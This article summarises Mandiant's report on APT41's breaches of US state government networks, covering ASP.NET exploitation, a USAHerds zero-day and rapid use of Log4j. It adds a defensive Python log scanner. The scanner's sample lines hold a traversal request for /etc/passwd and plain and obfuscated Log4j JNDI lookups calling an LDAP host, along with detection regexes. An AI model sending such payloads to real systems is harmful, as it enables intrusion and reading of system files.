Mandiant, the cybersecurity company that is about to be acquired by Google, has released a report on APT41 activity between May 2021 and February 2022. APT41 is a Chinese state-sponsored espionage group whose members are wanted by the FBI. The group targets both the public and private sectors.
Exploited at least six times
According to the report, the group has breached US state government networks at least six times. For these intrusions APT41 exploited vulnerabilities in internet-facing ASP.NET web applications, using .NET deserialization, SQL injection, and directory traversal techniques.
The group exploited a previously unknown zero-day vulnerability in the USAHerds application, and separately compromised another, unrelated agency. Mandiant notes that the group is very quick to weaponize publicly disclosed flaws to gain network access: APT41 began exploiting the infamous Log4j vulnerability within hours of the Apache Foundation's advisory, and later used it to compromise at least two US state governments as well as organizations in the insurance and telecommunications industries.
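Two of the vectors named above, directory traversal and Log4j JNDI lookups, leave recognizable traces in ordinary web-server access logs. The following Python script is an added example for defenders and is not code from Mandiant's report; the log lines it scans are constructed samples, and the detection patterns are generic (URL-decoded `../` sequences and `${jndi:` lookups, including the common `${lower:j}` and `${::-j}` obfuscation forms) rather than indicators tied to APT41.

```python
"""Flag web-server log lines carrying directory-traversal or Log4j JNDI lookup payloads.

Added example for log review; patterns are generic, not APT41-specific indicators.
"""
import re
from urllib.parse import unquote

# Constructed sample access-log lines (combined log format); not taken from the report.
SAMPLE_LOGS = [
    '203.0.113.5 - - [10/Dec/2021:21:14:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Dec/2021:21:14:09 +0000] "GET /app/download?file=..%2f..%2f..%2fetc%2fpasswd HTTP/1.1" 200 1024 "-" "curl/7.79"',
    '203.0.113.9 - - [10/Dec/2021:21:15:33 +0000] "GET / HTTP/1.1" 200 312 "-" "${jndi:ldap://203.0.113.9:1389/a}"',
    '203.0.113.9 - - [10/Dec/2021:21:15:40 +0000] "GET / HTTP/1.1" 200 312 "-" "${${lower:j}ndi:${lower:l}dap://203.0.113.9/b}"',
    '198.51.100.2 - - [10/Dec/2021:21:16:01 +0000] "GET /report?name=jan.pdf HTTP/1.1" 200 4096 "-" "Mozilla/5.0"',
]

# ".." followed by a path separator, not preceded by a dot or word character
# (so "jan.pdf" and "1.0.0.1" do not match).
TRAVERSAL_RE = re.compile(r'(?<![.\w])\.\.[\\/]')
# A JNDI lookup after obfuscation has been stripped.
JNDI_RE = re.compile(r'\$\{\s*jndi\s*:', re.IGNORECASE)
# Two widespread obfuscation idioms: ${lower:j} / ${upper:J} and default-value ${anything:-j}.
CASE_LOOKUP_RE = re.compile(r'\$\{(?:lower|upper):([^{}]*)\}', re.IGNORECASE)
DEFAULT_LOOKUP_RE = re.compile(r'\$\{[^{}]*?:-([^{}]*)\}')


def decode_fully(s, max_rounds=3):
    """URL-decode repeatedly (bounded) so double-encoded payloads are normalized."""
    for _ in range(max_rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s


def has_traversal(s):
    """True if the decoded text contains a ../ or ..\\ path-traversal sequence."""
    return bool(TRAVERSAL_RE.search(decode_fully(s)))


def normalize_lookups(s, max_rounds=10):
    """Collapse nested lower/upper/default lookups until the string stops changing."""
    for _ in range(max_rounds):
        new = CASE_LOOKUP_RE.sub(r'\1', s)
        new = DEFAULT_LOOKUP_RE.sub(r'\1', new)
        if new == s:
            break
        s = new
    return s


def has_jndi_lookup(s):
    """True if the text contains a ${jndi:...} lookup, obfuscated or not."""
    return bool(JNDI_RE.search(normalize_lookups(decode_fully(s))))


def scan(lines):
    """Return [(line_index, [reasons])] for every line that matches a pattern."""
    hits = []
    for i, line in enumerate(lines):
        reasons = []
        if has_traversal(line):
            reasons.append("directory-traversal")
        if has_jndi_lookup(line):
            reasons.append("log4j-jndi-lookup")
        if reasons:
            hits.append((i, reasons))
    return hits


if __name__ == "__main__":
    for idx, reasons in scan(SAMPLE_LOGS):
        print(f"line {idx}: {', '.join(reasons)}")
        print("   ", SAMPLE_LOGS[idx])
```

The script checks the whole log line rather than only the request path, because the Log4j lookup was commonly delivered in headers such as User-Agent that end up in the last field of a combined-format log. Bounding the decode and normalization loops keeps a crafted line from turning the scanner into a CPU sink.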
Mandiant's researchers state that the goals of the current campaign are unknown:
« The goals of this campaign are currently unknown, though Mandiant has observed evidence of APT41 exfiltrating Personal Identifiable Information (PII). Although the victimology and targeting of PII data are consistent with an espionage operation, Mandiant cannot make a definitive assessment at this time given APT41's history of moonlighting for personal financial gain. »